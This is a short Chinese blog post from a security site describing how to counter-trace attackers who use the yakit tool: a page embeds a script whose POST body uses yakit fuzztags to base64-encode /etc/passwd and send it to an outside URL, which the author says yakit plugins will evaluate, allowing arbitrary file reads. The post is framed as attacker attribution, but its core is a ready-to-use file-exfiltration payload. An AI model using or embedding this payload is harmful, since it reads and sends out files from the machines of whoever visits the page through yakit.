长亭百川云 - 文章详情

利用yakit功能特性溯源攻击者

Medi0cr1ty

54

2024-07-13

杜绝废话,随便在页面上嵌入一个js,内容是:

<script>  
  const xhr = new XMLHttpRequest();  
  xhr.open("POST", "http://yakit.com/filesubmit");  
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");  
  xhr.send(`file={{base64enc(file(/etc/passwd))}}`);  
</script>  

可自由发挥,读任意文件。

原因:yakit默认不会对经过MITM PROXY的流量中的fuzztag进行解析,但是经过插件时会被解析,所以这也是利用限制。

顺便吐槽:yakit跑起来卡卡的,啥时候能优化到和burp一样啊。

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2